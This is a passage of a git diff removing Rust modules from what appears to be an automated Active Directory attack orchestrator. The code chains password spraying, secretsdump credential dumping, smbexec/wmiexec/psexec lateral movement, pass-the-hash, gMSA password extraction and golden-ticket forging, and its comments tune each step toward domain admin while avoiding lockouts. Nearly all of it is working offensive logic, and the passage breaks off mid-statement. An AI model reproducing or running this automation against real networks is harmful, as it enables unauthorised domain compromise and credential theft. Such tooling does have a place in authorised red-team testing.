- .filter(|u| !state.is_delegation_account(&u.username)) - .filter(|u| !state.is_credential_quarantined(&u.username, &u.domain)) - .filter_map(|u| { - let user_domain = u.domain.to_lowercase(); - let dedup = format!("{}:{}", user_domain, u.username.to_lowercase()); - if state.is_processed(DEDUP_USERNAME_SPRAY, &dedup) { - return None; - } - // Exact match or child-domain fallback - let dc_ip = state - .domain_controllers - .get(&user_domain) - .cloned() - .or_else(|| { - let suffix = format!(".{user_domain}"); - state - .domain_controllers - .iter() - .find(|(d, _)| d.ends_with(&suffix)) - .map(|(_, ip)| ip.clone()) - })?; - Some((dedup, dc_ip, u.domain.clone())) - }) - .take(5) - .collect() - }; - - // Submit one spray task per domain (batched) - let mut sprayed_domains = std::collections::HashSet::new(); - for (_dedup_key, dc_ip, domain) in &spray_work { - if sprayed_domains.contains(domain) { - continue; - } - sprayed_domains.insert(domain.clone()); - - let payload = json!({ - "technique": "username_as_password", - "target_ip": dc_ip, - "domain": domain, - }); - - match dispatcher - .throttled_submit("credential_access", "credential_access", payload, 4) - .await - { - Ok(Some(task_id)) => { - debug!(task_id = %task_id, domain = %domain, "Password spray dispatched"); - // Mark all users in this domain's batch as processed - for (dk, _, d) in &spray_work { - if d == domain { - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_USERNAME_SPRAY, dk.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_USERNAME_SPRAY, dk) - .await; - } - } - } - Ok(None) => {} - Err(e) => warn!(err = %e, "Failed to dispatch password spray"), - } - } - - // --- Low-hanging fruit: SYSVOL, GPP, LDAP descriptions, LAPS per new credential --- - // Mirrors Python's fast credential discovery — dispatches high-success-rate - // techniques that find hardcoded/stored passwords in Active Directory. - let low_hanging_work: Vec<(String, String, ares_core::models::Credential)> = { - let state = dispatcher.state.read().await; - state - .credentials - .iter() - .filter(|c| !c.domain.is_empty() && !c.password.is_empty()) - // Skip delegation accounts — their auth is reserved for S4U. 
- .filter(|c| c.is_admin || !state.is_delegation_account(&c.username)) - .filter(|c| !state.is_credential_quarantined(&c.username, &c.domain)) - .filter_map(|cred| { - let cred_domain = cred.domain.to_lowercase(); - let dedup = format!("{}:{}", cred_domain, cred.username.to_lowercase()); - if state.is_processed(DEDUP_LOW_HANGING, &dedup) { - return None; - } - // Find DC for this credential's domain - let dc_ip = state - .domain_controllers - .get(&cred_domain) - .cloned() - .or_else(|| { - let suffix = format!(".{cred_domain}"); - state - .domain_controllers - .iter() - .find(|(d, _)| d.ends_with(&suffix)) - .map(|(_, ip)| ip.clone()) - }) - .or_else(|| state.target_ips.first().cloned())?; - Some((dedup, dc_ip, cred.clone())) - }) - .take(2) // Max 2 per cycle - .collect() - }; - - for (dedup_key, dc_ip, cred) in low_hanging_work { - match dispatcher - .request_low_hanging_fruit(&dc_ip, &cred.domain, &cred, 4) - .await - { - Ok(Some(task_id)) => { - info!( - task_id = %task_id, - domain = %cred.domain, - username = %cred.username, - "Low-hanging fruit credential discovery dispatched" - ); - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_LOW_HANGING, dedup_key.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_LOW_HANGING, &dedup_key) - .await; - } - Ok(None) => {} - Err(e) => warn!(err = %e, "Failed to dispatch low-hanging fruit"), - } - } - - // --- Secretsdump per new credential against same-domain hosts --- - // Dispatches secretsdump for new credentials against hosts in the same - // domain (or child/parent domains). Cross-domain attempts generate - // failed auths that trigger AD account lockout. - // Credentials may be local admin on member servers — secretsdump fails - // fast if not, but when it succeeds it's the fastest path to DA. - let sd_work: Vec<(String, String, ares_core::models::Credential)> = { - let state = dispatcher.state.read().await; - - // Skip if already DA - if state.has_domain_admin { - Vec::new() - } else { - let mut items = Vec::new(); - for cred in state - .credentials - .iter() - .filter(|c| !c.domain.is_empty() && !c.password.is_empty()) - // Skip delegation accounts — secretsdump will always fail - // (they're not admin) and burns auth budget needed for S4U. - .filter(|c| c.is_admin || !state.is_delegation_account(&c.username)) - .filter(|c| !state.is_credential_quarantined(&c.username, &c.domain)) - { - let cred_domain = cred.domain.to_lowercase(); - for host in &state.hosts { - // Resolve host domain: prefer hostname FQDN, fall back - // to domain_controllers map for bare-IP hosts. - let host_domain = { - let from_hostname = host - .hostname - .to_lowercase() - .split_once('.') - .map(|x| x.1) - .unwrap_or("") - .to_string(); - if from_hostname.is_empty() { - // Check if this IP is a known DC - state - .domain_controllers - .iter() - .find(|(_, ip)| ip.as_str() == host.ip) - .map(|(d, _)| d.to_lowercase()) - .unwrap_or_default() - } else { - from_hostname - } - }; - // Only target same-domain hosts. Skip unknown-domain - // hosts — they'll be retried next cycle after nmap - // populates hostnames. 
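// Worked example: a "contoso.local" credential is tried against hosts in
// "contoso.local" and "child.contoso.local", and a child-domain credential
// is tried against its parent's hosts, but "fabrikam.local" never matches.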
- if host_domain.is_empty() - || (host_domain != cred_domain - && !host_domain.ends_with(&format!(".{cred_domain}")) - && !cred_domain.ends_with(&format!(".{host_domain}"))) - { - continue; - } - - let dedup = format!( - "{}:{}:{}", - host.ip, - cred_domain, - cred.username.to_lowercase() - ); - if !state.is_processed(DEDUP_SECRETSDUMP, &dedup) { - items.push((dedup, host.ip.clone(), cred.clone())); - } - } - } - items.into_iter().take(5).collect() // Max 5 per cycle - } - }; - - for (dedup_key, target_ip, cred) in sd_work { - let priority = if cred.is_admin { 2 } else { 7 }; - match dispatcher - .request_secretsdump(&target_ip, &cred, priority) - .await - { - Ok(Some(task_id)) => { - info!( - task_id = %task_id, - target = %target_ip, - username = %cred.username, - "Credential secretsdump dispatched" - ); - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_SECRETSDUMP, dedup_key.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_SECRETSDUMP, &dedup_key) - .await; - } - Ok(None) => {} - Err(e) => warn!(err = %e, "Failed to dispatch credential secretsdump"), - } - } - - // --- Common password spray: per domain when no admin creds found yet --- - // Keep spraying common passwords until we find admin or achieve DA. - let common_spray_work: Vec<(String, String)> = { - let state = dispatcher.state.read().await; - if state.has_domain_admin || state.credentials.iter().any(|c| c.is_admin) { - // Already have admin creds or DA — skip common spray - Vec::new() - } else { - state - .domain_controllers - .iter() - .filter(|(domain, _)| { - let key = format!("common:{}", domain.to_lowercase()); - !state.is_processed(DEDUP_PASSWORD_SPRAY, &key) - }) - // Only spray after initial recon (AS-REP) has completed. - // This prevents spraying in the first cycle when Kerberoast - // hasn't had time to collect hashes yet. - .filter(|(domain, _)| { - state.is_processed(DEDUP_ASREP_DOMAINS, domain) - || state.is_processed(DEDUP_ASREP_DOMAINS, &domain.to_lowercase()) - }) - // Only spray after delegation enumeration has dispatched for - // at least one credential in this domain. Spraying before - // delegation can lock out accounts and prevent find_delegation - // from using valid credentials. - .filter(|(domain, _)| { - let prefix = format!("{}:", domain.to_lowercase()); - state.has_processed_prefix(DEDUP_DELEGATION_CREDS, &prefix) - }) - // Skip domains with UNCRACKED Kerberoast hashes — - // offline cracking is safer (no lockout risk) and handles - // complex passwords that spray would never find. - // Once all hashes are cracked (or none exist), spray proceeds - // as a fallback path for accounts without SPNs. - .filter(|(domain, _)| { - let d = domain.to_lowercase(); - !state.hashes.iter().any(|h| { - h.hash_type.to_lowercase().contains("kerberoast") - && h.domain.to_lowercase() == d - && h.cracked_password.is_none() - }) - }) - .map(|(domain, dc_ip)| (domain.clone(), dc_ip.clone())) - .collect() - } - }; - - for (domain, dc_ip) in common_spray_work { - let payload = json!({ - "techniques": ["password_spray", "username_as_password"], - "reason": "low_hanging_fruit", - "target_ip": dc_ip, - "domain": domain, - "use_common_passwords": true, - }); - - // Mark as processed BEFORE submitting to prevent duplicate deferred entries. - // The task will be dispatched or deferred regardless. 
- let key = format!("common:{}", domain.to_lowercase()); - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_PASSWORD_SPRAY, key.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_PASSWORD_SPRAY, &key) - .await; - - match dispatcher - .throttled_submit("credential_access", "credential_access", payload, 3) - .await - { - Ok(Some(task_id)) => { - info!(task_id = %task_id, domain = %domain, "Common password spray dispatched"); - } - Ok(None) => { - debug!(domain = %domain, "Common password spray deferred"); - } - Err(e) => warn!(err = %e, "Failed to dispatch common password spray"), - } - } - } -} diff --git a/ares-orchestrator/src/automation/credential_expansion.rs b/ares-orchestrator/src/automation/credential_expansion.rs deleted file mode 100644 index ca838b61..00000000 --- a/ares-orchestrator/src/automation/credential_expansion.rs +++ /dev/null @@ -1,410 +0,0 @@ -//! auto_credential_expansion -- test new credentials across discovered hosts. -//! -//! When new credentials arrive, this automation tries lateral movement -//! (smbexec, wmiexec, psexec) against non-owned hosts. It also tries -//! secretsdump on DCs for ALL credentials (not just admin — the credential -//! access agent determines feasibility). - -use std::sync::Arc; -use std::time::Duration; - -use tokio::sync::watch; -use tracing::debug; - -use crate::dispatcher::Dispatcher; -use crate::state::*; - -/// Lateral movement techniques to try, in order of stealth preference. -const LATERAL_TECHNIQUES: &[&str] = &["smbexec", "wmiexec", "psexec"]; - -/// Monitors for new credentials and dispatches lateral movement + secretsdump. -/// Interval: 15s. Enhanced version of the original auto_credential_expansion. -pub async fn auto_credential_expansion( - dispatcher: Arc, - mut shutdown: watch::Receiver, -) { - let mut interval = tokio::time::interval(Duration::from_secs(15)); - interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); - - loop { - tokio::select! { - _ = interval.tick() => {}, - _ = shutdown.changed() => break, - } - if *shutdown.borrow() { - break; - } - - let work: Vec = { - let state = dispatcher.state.read().await; - - // Skip if already domain admin - if state.has_domain_admin { - continue; - } - - state - .credentials - .iter() - .filter(|c| !c.domain.is_empty() && !c.password.is_empty()) - // Skip delegation accounts — their auth is reserved for S4U. - .filter(|c| c.is_admin || !state.is_delegation_account(&c.username)) - // Skip quarantined credentials — locked out, retry after expiry. - .filter(|c| !state.is_credential_quarantined(&c.username, &c.domain)) - .filter_map(|cred| { - let dedup = format!( - "{}:{}", - cred.domain.to_lowercase(), - cred.username.to_lowercase() - ); - if state.is_processed(DEDUP_EXPANSION_CREDS, &dedup) { - return None; - } - - // Collect non-owned host IPs in the same domain (or child - // domains). Cross-domain lateral attempts with wrong-domain - // creds generate failed auth that triggers AD lockout. - // Domain is extracted from hostname (e.g., - // dc02.child.contoso.local → child.contoso.local). - // Resolve NetBIOS domain names (e.g. "CHILD") to FQDN - // via the netbios_to_fqdn map before matching. 
- let cred_dom = { - let raw = cred.domain.to_lowercase(); - if !raw.contains('.') { - state - .netbios_to_fqdn - .get(&raw) - .or_else(|| state.netbios_to_fqdn.get(&cred.domain.to_uppercase())) - .map(|fqdn| fqdn.to_lowercase()) - .unwrap_or(raw) - } else { - raw - } - }; - let targets: Vec = state - .hosts - .iter() - .filter(|h| !h.owned) - .filter(|h| { - // Resolve host domain: prefer hostname FQDN, fall - // back to domain_controllers map for bare-IP hosts. - let host_domain = { - let from_hostname = h - .hostname - .to_lowercase() - .split_once('.') - .map(|x| x.1) - .unwrap_or("") - .to_string(); - if from_hostname.is_empty() { - state - .domain_controllers - .iter() - .find(|(_, ip)| ip.as_str() == h.ip) - .map(|(d, _)| d.to_lowercase()) - .unwrap_or_default() - } else { - from_hostname - } - }; - // Skip unknown-domain hosts — retry next cycle - // after nmap populates hostnames. - !host_domain.is_empty() - && (host_domain == cred_dom - || host_domain.ends_with(&format!(".{cred_dom}")) - || cred_dom.ends_with(&format!(".{host_domain}"))) - }) - .map(|h| h.ip.clone()) - .collect(); - - if targets.is_empty() { - return None; - } - - // Find DCs for this credential's domain (for secretsdump). - // Also include child-domain DCs — parent creds are valid in child domains. - // Reuse resolved cred_dom (already NetBIOS→FQDN resolved). - let cred_domain = cred_dom.clone(); - let dc_ips: Vec = state - .domain_controllers - .iter() - .filter(|(domain, _)| { - let d = domain.to_lowercase(); - d == cred_domain || d.ends_with(&format!(".{cred_domain}")) - }) - .map(|(_, ip)| ip.clone()) - .collect(); - - Some(ExpansionWork { - dedup_key: dedup, - credential: cred.clone(), - targets, - dc_ips, - is_admin: cred.is_admin, - }) - }) - .take(3) // Process max 3 new creds per cycle - .collect() - }; - - for item in work { - let mut any_dispatched = false; - - // 1. Try secretsdump on DCs FIRST — this is the highest-value op - // for a new credential. Must run before lateral movement to avoid - // burning CredentialInflight slots on lower-value tasks. - // Admin creds get priority 2; non-admin get priority 3 (higher - // than lateral at 5) since secretsdump is the fastest path to - // krbtgt → DA → golden ticket. - for dc_ip in &item.dc_ips { - let sd_dedup = format!( - "{}:{}:{}", - dc_ip, - item.credential.domain.to_lowercase(), - item.credential.username.to_lowercase() - ); - let already_dumped = { - let state = dispatcher.state.read().await; - state.is_processed(DEDUP_SECRETSDUMP, &sd_dedup) - }; - - if !already_dumped { - let priority = if item.is_admin { 2 } else { 3 }; - if let Ok(Some(task_id)) = dispatcher - .request_secretsdump(dc_ip, &item.credential, priority) - .await - { - any_dispatched = true; - debug!( - task_id = %task_id, - dc = %dc_ip, - is_admin = item.is_admin, - "Credential secretsdump dispatched" - ); - - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_SECRETSDUMP, sd_dedup.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_SECRETSDUMP, &sd_dedup) - .await; - } - } - } - - // 2. Try lateral movement on non-DC hosts (up to 5 targets). - // Runs after secretsdump so the high-value op gets credential - // inflight slots first. 
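// Note: only LATERAL_TECHNIQUES[0] (smbexec) is attempted in this loop;
// wmiexec and psexec remain as stealth-ordered fallbacks and are not
// retried here when smbexec fails.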
- let technique = LATERAL_TECHNIQUES[0]; // Start with smbexec - for target_ip in item.targets.iter().take(5) { - if let Ok(Some(task_id)) = dispatcher - .request_lateral(target_ip, &item.credential, technique) - .await - { - any_dispatched = true; - debug!( - task_id = %task_id, - target = %target_ip, - technique = technique, - username = %item.credential.username, - "Credential expansion lateral dispatched" - ); - } - } - - // Only mark as processed if at least one task was actually dispatched. - // If all tasks were throttled/deferred, retry next cycle. - if any_dispatched { - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_EXPANSION_CREDS, item.dedup_key.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_EXPANSION_CREDS, &item.dedup_key) - .await; - } - } - - // 3. Try hashes for pass-the-hash lateral movement - let hash_work: Vec = { - let state = dispatcher.state.read().await; - - if state.has_domain_admin { - continue; - } - - state - .hashes - .iter() - .filter(|h| { - h.hash_type.to_lowercase() == "ntlm" - && !h.domain.is_empty() - && h.username.to_lowercase() != "krbtgt" - && !h.username.ends_with('$') - }) - .filter_map(|hash| { - let dedup = format!( - "{}:{}:{}", - hash.domain.to_lowercase(), - hash.username.to_lowercase(), - &hash.hash_value[..32.min(hash.hash_value.len())] - ); - if state.is_processed(DEDUP_HASH_LATERAL, &dedup) { - return None; - } - - let targets: Vec = state - .hosts - .iter() - .filter(|h| !h.owned) - .map(|h| h.ip.clone()) - .collect(); - - if targets.is_empty() { - return None; - } - - Some(HashExpansionWork { - dedup_key: dedup, - hash: hash.clone(), - targets, - }) - }) - .take(2) - .collect() - }; - - for item in hash_work { - let mut dc_sd_dispatched = false; - - // Build a credential-like object for pass-the-hash - let pth_cred = ares_core::models::Credential { - id: format!("pth_{}", item.hash.username), - username: item.hash.username.clone(), - password: item.hash.hash_value.clone(), - domain: item.hash.domain.clone(), - source: "hash_pth".to_string(), - discovered_at: None, - is_admin: false, - parent_id: None, - attack_step: 0, - }; - - for target_ip in item.targets.iter().take(3) { - if let Ok(Some(task_id)) = dispatcher - .request_lateral(target_ip, &pth_cred, "pth_smbclient") - .await - { - debug!( - task_id = %task_id, - target = %target_ip, - username = %item.hash.username, - "Hash-based lateral dispatched" - ); - } - } - - // 4. Hash→secretsdump: try pass-the-hash secretsdump against DCs. - // This is the fastest path from hash → krbtgt → DA. - { - let state = dispatcher.state.read().await; - let dc_ips: Vec = state.domain_controllers.values().cloned().collect(); - drop(state); - - for dc_ip in dc_ips { - let sd_dedup = format!( - "{}:{}:{}", - dc_ip, - item.hash.domain.to_lowercase(), - item.hash.username.to_lowercase() - ); - let already = { - let state = dispatcher.state.read().await; - state.is_processed(DEDUP_SECRETSDUMP, &sd_dedup) - }; - if !already { - if let Ok(Some(task_id)) = - dispatcher.request_secretsdump(&dc_ip, &pth_cred, 2).await - { - dc_sd_dispatched = true; - debug!( - task_id = %task_id, - dc = %dc_ip, - username = %item.hash.username, - "Hash-based secretsdump dispatched" - ); - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_SECRETSDUMP, sd_dedup.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_SECRETSDUMP, &sd_dedup) - .await; - } - } - } - } - - // Only mark as fully processed once DC secretsdump has been dispatched. 
- // PTH lateral alone is not sufficient — the critical path is hash→DC→krbtgt. - if dc_sd_dispatched { - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_HASH_LATERAL, item.dedup_key.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_HASH_LATERAL, &item.dedup_key) - .await; - } - } - } -} - -struct ExpansionWork { - dedup_key: String, - credential: ares_core::models::Credential, - targets: Vec, - dc_ips: Vec, - is_admin: bool, -} - -struct HashExpansionWork { - dedup_key: String, - hash: ares_core::models::Hash, - targets: Vec, -} - -#[cfg(test)] -mod tests { - use super::*; - - #[test] - fn test_lateral_techniques_order() { - // smbexec first (stealthiest), then wmiexec, then psexec - assert_eq!(LATERAL_TECHNIQUES[0], "smbexec"); - assert_eq!(LATERAL_TECHNIQUES[1], "wmiexec"); - assert_eq!(LATERAL_TECHNIQUES[2], "psexec"); - } - - #[test] - fn test_lateral_techniques_count() { - assert_eq!(LATERAL_TECHNIQUES.len(), 3); - } - - #[test] - fn test_lateral_techniques_contains() { - assert!(LATERAL_TECHNIQUES.contains(&"smbexec")); - assert!(LATERAL_TECHNIQUES.contains(&"wmiexec")); - assert!(LATERAL_TECHNIQUES.contains(&"psexec")); - assert!(!LATERAL_TECHNIQUES.contains(&"evil-winrm")); - } -} diff --git a/ares-orchestrator/src/automation/delegation.rs b/ares-orchestrator/src/automation/delegation.rs deleted file mode 100644 index 0d70077a..00000000 --- a/ares-orchestrator/src/automation/delegation.rs +++ /dev/null @@ -1,103 +0,0 @@ -//! auto_delegation_enumeration -- find delegation for new creds. - -use std::sync::Arc; -use std::time::Duration; - -use tokio::sync::watch; -use tracing::{debug, warn}; - -use crate::dispatcher::Dispatcher; -use crate::state::*; - -/// Dispatches delegation enumeration for new credentials. -/// Interval: 30s. Matches Python `_auto_delegation_enumeration`. -pub async fn auto_delegation_enumeration( - dispatcher: Arc, - mut shutdown: watch::Receiver, -) { - let notify = dispatcher.delegation_notify.clone(); - let mut interval = tokio::time::interval(Duration::from_secs(30)); - interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); - - loop { - tokio::select! { - _ = interval.tick() => {}, - _ = notify.notified() => {}, - _ = shutdown.changed() => break, - } - if *shutdown.borrow() { - break; - } - - let work: Vec<(String, String, String, ares_core::models::Credential)> = { - let state = dispatcher.state.read().await; - state - .credentials - .iter() - // Skip delegation accounts — delegation enum is already done - // with other creds, and using a delegation account's cred - // burns auth budget reserved for S4U. - .filter(|c| !state.is_delegation_account(&c.username)) - .filter(|c| !state.is_credential_quarantined(&c.username, &c.domain)) - .filter_map(|cred| { - if cred.domain.is_empty() { - return None; - } - let cred_domain = cred.domain.to_lowercase(); - let dedup = format!("{}:{}", cred_domain, cred.username.to_lowercase()); - if state.is_processed(DEDUP_DELEGATION_CREDS, &dedup) { - return None; - } - // Exact match first - let dc_ip = state - .domain_controllers - .get(&cred_domain) - .cloned() - .or_else(|| { - // Child-domain fallback: cred domain is parent, - // DC is registered under child (e.g. 
cred=contoso.local, - // DC=child.contoso.local) - let suffix = format!(".{cred_domain}"); - state - .domain_controllers - .iter() - .find(|(d, _)| d.ends_with(&suffix)) - .map(|(_, ip)| ip.clone()) - }) - .or_else(|| { - // Parent-domain fallback: cred domain is child, - // DC is registered under parent - state - .domain_controllers - .iter() - .find(|(d, _)| cred_domain.ends_with(&format!(".{d}"))) - .map(|(_, ip)| ip.clone()) - })?; - Some((dedup, cred.domain.clone(), dc_ip, cred.clone())) - }) - .collect() - }; - - for (dedup_key, domain, dc_ip, cred) in work { - match dispatcher - .request_delegation_enum(&domain, &dc_ip, &cred) - .await - { - Ok(Some(task_id)) => { - debug!(task_id = %task_id, domain = %domain, "Delegation enumeration dispatched"); - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_DELEGATION_CREDS, dedup_key.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_DELEGATION_CREDS, &dedup_key) - .await; - } - Ok(None) => {} - Err(e) => warn!(err = %e, "Failed to dispatch delegation enumeration"), - } - } - } -} diff --git a/ares-orchestrator/src/automation/gmsa.rs b/ares-orchestrator/src/automation/gmsa.rs deleted file mode 100644 index 16233556..00000000 --- a/ares-orchestrator/src/automation/gmsa.rs +++ /dev/null @@ -1,145 +0,0 @@ -//! auto_gmsa_extraction -- dump gMSA passwords when gMSA accounts are found. -//! -//! Group Managed Service Accounts (gMSA) store their passwords in Active -//! Directory in the `msDS-ManagedPassword` attribute. Any principal with read -//! access can retrieve the plaintext password. When we discover users whose -//! names end with `$` and whose descriptions mention "managed service account" -//! (or via BloodHound gMSA edges), we dispatch `gmsa_dump_passwords`. - -use std::sync::Arc; -use std::time::Duration; - -use serde_json::json; -use tokio::sync::watch; -use tracing::{debug, info, warn}; - -use crate::dispatcher::Dispatcher; -use crate::state::*; - -/// Monitors for gMSA accounts and dispatches password extraction. -/// Interval: 30s. -pub async fn auto_gmsa_extraction( - dispatcher: Arc, - mut shutdown: watch::Receiver, -) { - let mut interval = tokio::time::interval(Duration::from_secs(30)); - interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); - - loop { - tokio::select! 
{ - _ = interval.tick() => {}, - _ = shutdown.changed() => break, - } - if *shutdown.borrow() { - break; - } - - let work: Vec = { - let state = dispatcher.state.read().await; - - // Need at least one credential to query AD for gMSA passwords - if state.credentials.is_empty() { - continue; - } - - // Find gMSA-like accounts from discovered users - let gmsa_accounts: Vec = state - .users - .iter() - .filter_map(|user| { - // gMSA accounts typically end with $ and have "managed service" - // in description, or their name contains "gmsa" / "msds" - let is_gmsa = user.username.ends_with('$') - && (user.description.to_lowercase().contains("managed service") - || user.username.to_lowercase().contains("gmsa")); - - if !is_gmsa { - return None; - } - - let dedup_key = format!( - "{}:{}", - user.domain.to_lowercase(), - user.username.to_lowercase() - ); - if state.is_processed(DEDUP_GMSA_ACCOUNTS, &dedup_key) { - return None; - } - - // Find a credential we can use to query this domain - let cred = state - .credentials - .iter() - .find(|c| c.domain.to_lowercase() == user.domain.to_lowercase())?; - - let dc_ip = state - .domain_controllers - .get(&user.domain.to_lowercase()) - .cloned()?; - - Some(GmsaWork { - dedup_key, - gmsa_account: user.username.clone(), - domain: user.domain.clone(), - dc_ip, - credential: cred.clone(), - }) - }) - .collect(); - - gmsa_accounts - }; - - for item in work { - let payload = json!({ - "technique": "gmsa_dump_passwords", - "target_ip": item.dc_ip, - "domain": item.domain, - "gmsa_account": item.gmsa_account, - "credential": { - "username": item.credential.username, - "password": item.credential.password, - "domain": item.credential.domain, - }, - }); - - match dispatcher - .throttled_submit("credential_access", "credential_access", payload, 3) - .await - { - Ok(Some(task_id)) => { - info!( - task_id = %task_id, - gmsa_account = %item.gmsa_account, - domain = %item.domain, - "gMSA password dump dispatched" - ); - - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_GMSA_ACCOUNTS, item.dedup_key.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_GMSA_ACCOUNTS, &item.dedup_key) - .await; - } - Ok(None) => { - debug!(gmsa = %item.gmsa_account, "gMSA task deferred by throttler"); - } - Err(e) => { - warn!(err = %e, gmsa = %item.gmsa_account, "Failed to dispatch gMSA dump") - } - } - } - } -} - -struct GmsaWork { - dedup_key: String, - gmsa_account: String, - domain: String, - dc_ip: String, - credential: ares_core::models::Credential, -} diff --git a/ares-orchestrator/src/automation/golden_ticket.rs b/ares-orchestrator/src/automation/golden_ticket.rs deleted file mode 100644 index 7c57be5d..00000000 --- a/ares-orchestrator/src/automation/golden_ticket.rs +++ /dev/null @@ -1,295 +0,0 @@ -//! auto_golden_ticket -- monitor for krbtgt hash and forge golden ticket. - -use std::sync::Arc; -use std::time::Duration; - -use serde_json::json; -use tokio::sync::watch; -use tracing::{info, warn}; - -use crate::dispatcher::Dispatcher; - -/// Monitors for krbtgt hash and triggers golden ticket forging. -/// Interval: 30s. Matches Python `_auto_golden_ticket`. -pub async fn auto_golden_ticket(dispatcher: Arc, mut shutdown: watch::Receiver) { - let mut interval = tokio::time::interval(Duration::from_secs(30)); - interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); - - loop { - tokio::select! 
{ - _ = interval.tick() => {}, - _ = shutdown.changed() => break, - } - if *shutdown.borrow() { - break; - } - - let state = dispatcher.state.read().await; - - // Skip if already have golden ticket - if state.has_golden_ticket { - continue; - } - - // Skip if no domain admin yet - if !state.has_domain_admin { - continue; - } - - // Look for krbtgt hash - let krbtgt_hash = state - .hashes - .iter() - .find(|h| h.username.to_lowercase() == "krbtgt"); - - let krbtgt = match krbtgt_hash { - Some(h) => h.clone(), - None => continue, - }; - - let domain = if !krbtgt.domain.is_empty() { - krbtgt.domain.clone() - } else { - match state.domains.first() { - Some(d) => d.clone(), - None => continue, - } - }; - - // Domain SID: prefer cached value, resolve via lookupsid if missing. - let mut domain_sid = state.domain_sids.get(&domain.to_lowercase()).cloned(); - - // Look up a DC IP for this domain - let dc_ip = state - .domain_controllers - .get(&domain.to_lowercase()) - .cloned(); - - // Find the best credential for the domain: prefer plaintext, fall back to NTLM hash. - let admin_cred = state - .credentials - .iter() - .find(|c| { - c.username.to_lowercase() == "administrator" - && c.domain.to_lowercase() == domain.to_lowercase() - }) - .cloned(); - let admin_hash = state - .hashes - .iter() - .find(|h| { - h.username.to_lowercase() == "administrator" - && h.domain.to_lowercase() == domain.to_lowercase() - && h.hash_type.to_uppercase() == "NTLM" - }) - .cloned(); - - // Collect a password credential for SID lookup (any domain user will do). - // Prefer a cred from the target domain, but fall back to any valid cred - // since NTLM cross-domain auth works for lookupsid via trust relationships. - let lookup_cred = state - .credentials - .iter() - .find(|c| { - c.domain.to_lowercase() == domain.to_lowercase() - && !c.password.is_empty() - && !state.is_credential_quarantined(&c.username, &c.domain) - }) - .or_else(|| { - state.credentials.iter().find(|c| { - !c.password.is_empty() - && !state.is_credential_quarantined(&c.username, &c.domain) - }) - }) - .cloned(); - - drop(state); - - // ── Resolve domain SID if not cached ──────────────────────────── - if domain_sid.is_none() { - if let Some(ref target_ip) = dc_ip { - let result = resolve_domain_sid( - &domain, - target_ip, - lookup_cred.as_ref(), - admin_hash.as_ref(), - ) - .await; - - // Cache the resolved SID and admin name - if let Some((ref sid, ref admin_name)) = result { - info!(domain = %domain, sid = %sid, admin = admin_name.as_deref().unwrap_or("Administrator"), "Domain SID resolved via lookupsid"); - let op_id = { dispatcher.state.read().await.operation_id.clone() }; - let reader = ares_core::state::RedisStateReader::new(op_id); - let mut conn = dispatcher.queue.connection(); - if let Err(e) = reader - .set_domain_sid(&mut conn, &domain.to_lowercase(), sid) - .await - { - warn!(err = %e, "Failed to persist domain SID to Redis"); - } - if let Some(ref name) = admin_name { - if let Err(e) = reader - .set_admin_name(&mut conn, &domain.to_lowercase(), name) - .await - { - warn!(err = %e, "Failed to persist admin name to Redis"); - } - } - let mut state = dispatcher.state.write().await; - state.domain_sids.insert(domain.to_lowercase(), sid.clone()); - if let Some(ref name) = admin_name { - state - .admin_names - .insert(domain.to_lowercase(), name.clone()); - } - } - - domain_sid = result.map(|(sid, _)| sid); - } - } - - let domain_sid = match domain_sid { - Some(sid) => sid, - None => { - warn!(domain = %domain, "Cannot resolve domain SID — 
skipping golden ticket"); - continue; - } - }; - - // Use cached RID-500 name, defaulting to "Administrator" when unknown. - let admin_username = { - let state = dispatcher.state.read().await; - state - .admin_names - .get(&domain.to_lowercase()) - .cloned() - .unwrap_or_else(|| "Administrator".to_string()) - }; - - // ── Build and submit golden ticket task ───────────────────────── - // Strip LM prefix if hash is in "lm:ntlm" format — ticketer expects - // a single 32-char NTLM hex string, not the LM:NTLM pair. - let ntlm_hash = match krbtgt.hash_value.rsplit_once(':') { - Some((_, ntlm)) if ntlm.len() == 32 => ntlm.to_string(), - _ => krbtgt.hash_value.clone(), - }; - - let mut payload = json!({ - "technique": "golden_ticket", - "vuln_type": "golden_ticket", - "domain": domain, - "krbtgt_hash": ntlm_hash, - "username": admin_username, - "domain_sid": domain_sid, - }); - if let Some(ip) = dc_ip { - payload["dc_ip"] = json!(ip); - } - if let Some(ref cred) = admin_cred { - payload["admin_password"] = json!(cred.password); - payload["admin_domain"] = json!(cred.domain); - } - if let Some(ref hash) = admin_hash { - payload["admin_hash"] = json!(hash.hash_value); - payload["admin_domain"] = - json!(admin_cred.as_ref().map_or(&hash.domain, |c| &c.domain)); - } - if let Some(ref aes) = krbtgt.aes_key { - payload["aes_key"] = json!(aes); - } - - match dispatcher - .throttled_submit("exploit", "privesc", payload, 1) - .await - { - Ok(Some(task_id)) => { - info!(task_id = %task_id, domain = %domain, "Golden ticket task dispatched"); - // Mark has_golden_ticket immediately to prevent re-dispatch. - // The result processing will also confirm on task completion - // (detects "Saving ticket in *.ccache" in tool output). - if let Err(e) = dispatcher - .state - .set_golden_ticket(&dispatcher.queue, &domain) - 